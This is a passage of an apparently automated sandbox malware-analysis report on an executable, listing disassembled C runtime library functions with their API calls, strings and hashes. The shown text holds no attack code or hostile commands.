                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\RPHbzz3JqY.exe$}L`
                                                                                                                                                                                            • API String ID: 0-3499546593
                                                                                                                                                                                            • Opcode ID: 4638b63f38ddad28bdb6b78d7fc6df5e1610734cfbf0f7a1f12e4438dc65efd3
                                                                                                                                                                                            • Instruction ID: 95762fa2229ae26902c4911c61637f8cb91ae70cf12ab629c176f6c7136f3416
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4638b63f38ddad28bdb6b78d7fc6df5e1610734cfbf0f7a1f12e4438dc65efd3
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF21B0B164810A6FDB34AF618C84EBB7BAEEE803687104514FA15962D1EF64EC1187A0
                                                                                                                                                                                            Function 005FD0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                                                                            • Opcode ID: 4ecd05929889a804de0a8bcd181cf55fe913f693ad464623a5077b6c2c87e51f
                                                                                                                                                                                            • Instruction ID: ce7b2149284a1a36f7e1832274e878d980ba8ab7f36e577d142845ef00672c16
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ecd05929889a804de0a8bcd181cf55fe913f693ad464623a5077b6c2c87e51f
                                                                                                                                                                                            • Instruction Fuzzy Hash: BD21C632A41229A7CB214B248D45F7B7FBBBB057A0F150914FE16A7290DB39DD00C6F0
                                                                                                                                                                                            Function 006066B3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 006063FF: _free.LIBCMT ref: 00606424
                                                                                                                                                                                            • _free.LIBCMT ref: 00606701
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 0060670C
                                                                                                                                                                                            • _free.LIBCMT ref: 00606717
                                                                                                                                                                                            • _free.LIBCMT ref: 0060676B
                                                                                                                                                                                            • _free.LIBCMT ref: 00606776
                                                                                                                                                                                            • _free.LIBCMT ref: 00606781
                                                                                                                                                                                            • _free.LIBCMT ref: 0060678C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
                                                                                                                                                                                            • Instruction ID: 9a852376d423f5eb5c7e76c4cf54eb43446b57db431a26cd9cc29827ae289bcb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
                                                                                                                                                                                            • Instruction Fuzzy Hash: F21181315C0B08BBD569B7B0CD0BFDB7F9DAF40740F40083CB79966092DA39B5254694
                                                                                                                                                                                            Function 005F6642 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005F6637,?,?,005F65FF,00000001,00000000,?), ref: 005F6657
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F666A
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,005F6637,?,?,005F65FF,00000001,00000000,?), ref: 005F668D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: @0]$CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-173498003
                                                                                                                                                                                            • Opcode ID: b651c5fdd4f45f76d5a0856b41a0be311759b5308fbfd2c19e686adf0f21b547
                                                                                                                                                                                            • Instruction ID: 8b28d546126019d1d7109170c074b576dd171d2cd4d3f7886b412c70b9afa398
                                                                                                                                                                                            • Opcode Fuzzy Hash: b651c5fdd4f45f76d5a0856b41a0be311759b5308fbfd2c19e686adf0f21b547
                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF05830A4022CBBDB119BA0DC09BAEBEAAEF00756F050460AA01E61A0CB758E00DA94
                                                                                                                                                                                            Function 005FDE56 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 005FDE9E
                                                                                                                                                                                            • __fassign.LIBCMT ref: 005FE083
                                                                                                                                                                                            • __fassign.LIBCMT ref: 005FE0A0
                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005FE0E8
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005FE128
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 005FE1D0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1735259414-0
                                                                                                                                                                                            • Opcode ID: 9aa2734bd5e5ef99c2637931f18c4001985f497adbebedbee1d45cae952c71c5
                                                                                                                                                                                            • Instruction ID: ab9e0bddbc0f9e1b5954e69baceee0e01a229faf821e6e9fd9f7cfd95e7d9304
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aa2734bd5e5ef99c2637931f18c4001985f497adbebedbee1d45cae952c71c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EC1AD71D0025D9FDB24CFA9C8809EDBFB6BF48304F28416AE956B7352D6359D06CB60
                                                                                                                                                                                            Function 005F051C Relevance: 9.2, APIs: 6, Instructions: 224COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 005F05A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005F0635
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005F06A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005F06C1
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005F0724
                                                                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 005F0741
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2984826149-0
                                                                                                                                                                                            • Opcode ID: 09f2558c92068c3b75b797065ed3b1192420b6af17e3945ae90ee397b461ae45
                                                                                                                                                                                            • Instruction ID: c09a215e81bd580fd0181869f93db2d96d42eff4bc3cba844e2412a47fb4bcff
                                                                                                                                                                                            • Opcode Fuzzy Hash: 09f2558c92068c3b75b797065ed3b1192420b6af17e3945ae90ee397b461ae45
                                                                                                                                                                                            • Instruction Fuzzy Hash: 83718D7190120EAADF219FA4CC49AFE7FB6FF85350F1C2455EA05E6192DB799840CBA0
                                                                                                                                                                                            Function 005F02E2 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005F032B
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005F0396
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F03B3
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005F03F2
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F0451
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005F0474
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                                                                            • Opcode ID: c22bc67121f7773a66855a25d989e7295d3064570b1faf5069c440d90c1e5b95
                                                                                                                                                                                            • Instruction ID: fb3dedde16d7b7fc1cb9c3bddd8d6ff2e823c51b7ff93644e149eeb1c5c03214
                                                                                                                                                                                            • Opcode Fuzzy Hash: c22bc67121f7773a66855a25d989e7295d3064570b1faf5069c440d90c1e5b95
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C518D7250021EABEF209F64CC49FBB7FAAFB44750F189925BB05961D2D7798C108BA0
                                                                                                                                                                                            Function 00600E0B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID: $i_
                                                                                                                                                                                            • API String ID: 3213747228-2414783397
                                                                                                                                                                                            • Opcode ID: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
                                                                                                                                                                                            • Instruction ID: 4b08b76d5def55339a86dcec00c0b26b49fe4c7bb8d757bc30dd79b2a1f399d4
                                                                                                                                                                                            • Opcode Fuzzy Hash: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43B149719402869FEB298F24C8417FFBBF6EF56300F1441AAE945AF381D6349D41C760
                                                                                                                                                                                            Function 005F395A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,005F3951,005F27FB,005F15E7), ref: 005F3968
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F3976
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F398F
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,005F3951,005F27FB,005F15E7), ref: 005F39E1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: 300e414b6d0f42656769e0e713988273b85ebeeb90939450eed1f8caef365ee3
                                                                                                                                                                                            • Instruction ID: 3e9f63e15d2ab1747510464908273a015cec1f6a3c24788a93b5445374bede0e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 300e414b6d0f42656769e0e713988273b85ebeeb90939450eed1f8caef365ee3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2901B53220A21A5EBB246B756C9AA7B2E46FB45776724123AF318412E2FED94D015540
                                                                                                                                                                                            Function 005F3A71 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 1740715915-1162301288
                                                                                                                                                                                            • Opcode ID: bde7764eac2eeda61790ee326846fb8895d4863e670b0ddaef82273b3f8f4562
                                                                                                                                                                                            • Instruction ID: b26a858e6e6362c206225e245346c15c130fb7f7c1a2ba5878244c219448e411
                                                                                                                                                                                            • Opcode Fuzzy Hash: bde7764eac2eeda61790ee326846fb8895d4863e670b0ddaef82273b3f8f4562
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6651CF7160160EAFEB249F10C855B7A7FA5FF40710F24482DEE4587291E739AE41D790
                                                                                                                                                                                            Function 005F49F2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,005F4AB3,?,?,00620B4C,00000000,?,005F4BDE,00000004,InitializeCriticalSectionEx,00611958,mscoree.dll,00000000), ref: 005F4A82
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                                                                            • Opcode ID: 9b988abd6b198defed7e0f51b1bb3adf4d89ea6e080ec04bd5656329fc3649c1
                                                                                                                                                                                            • Instruction ID: 4a245f1adb8b4f38342fa4a56a7895d95ed94d9656c075199f02655550cd9585
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b988abd6b198defed7e0f51b1bb3adf4d89ea6e080ec04bd5656329fc3649c1
                                                                                                                                                                                            • Instruction Fuzzy Hash: A111CA32AC1239ABDB318B689C4476B3B9ABF41770F150951FA51EB280D774ED008ED9
                                                                                                                                                                                            Function 00606188 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 006061A0
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 006061B2
                                                                                                                                                                                            • _free.LIBCMT ref: 006061C4
                                                                                                                                                                                            • _free.LIBCMT ref: 006061D6
                                                                                                                                                                                            • _free.LIBCMT ref: 006061E8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 04e09cffdc8fc455571419066f49bf780ff7b56eaced4f244914e42ba9c71b57
                                                                                                                                                                                            • Instruction ID: 44bda84abd51fc8cd5c880ba0c3fd2c292473a637d17c27ca69671b3ad178b53
                                                                                                                                                                                            • Opcode Fuzzy Hash: 04e09cffdc8fc455571419066f49bf780ff7b56eaced4f244914e42ba9c71b57
                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F01232584248BBC625EB58FA86C9B7FEFBA407207585866F619D7642CB34FCA08650
                                                                                                                                                                                            Function 005D1CC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005D1D46
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 8e615ca537233f60dec03f20f56955f6796ef1ac6db502d44e0d831a5412c922
                                                                                                                                                                                            • Instruction ID: 4c11eab08e431ef7d1b95c1ce5a274ca44afaa0c2996069e55c13a603971a402
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e615ca537233f60dec03f20f56955f6796ef1ac6db502d44e0d831a5412c922
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B616BB1A00615DFDB14CF18C885B9ABBF5FF48300F1484AAED459B386D776E901CB91
                                                                                                                                                                                            Function 005D23F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 005D254F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-1866435925
                                                                                                                                                                                            • Opcode ID: e158e7cf22e74cec819319abcec0173db0779319f0c80bf8000b48deca5a0bc9
                                                                                                                                                                                            • Instruction ID: eaa9b60f691ed6d9694b119d2e1992f9b09bed3bdf05e26709bf1ee3470f8b68
                                                                                                                                                                                            • Opcode Fuzzy Hash: e158e7cf22e74cec819319abcec0173db0779319f0c80bf8000b48deca5a0bc9
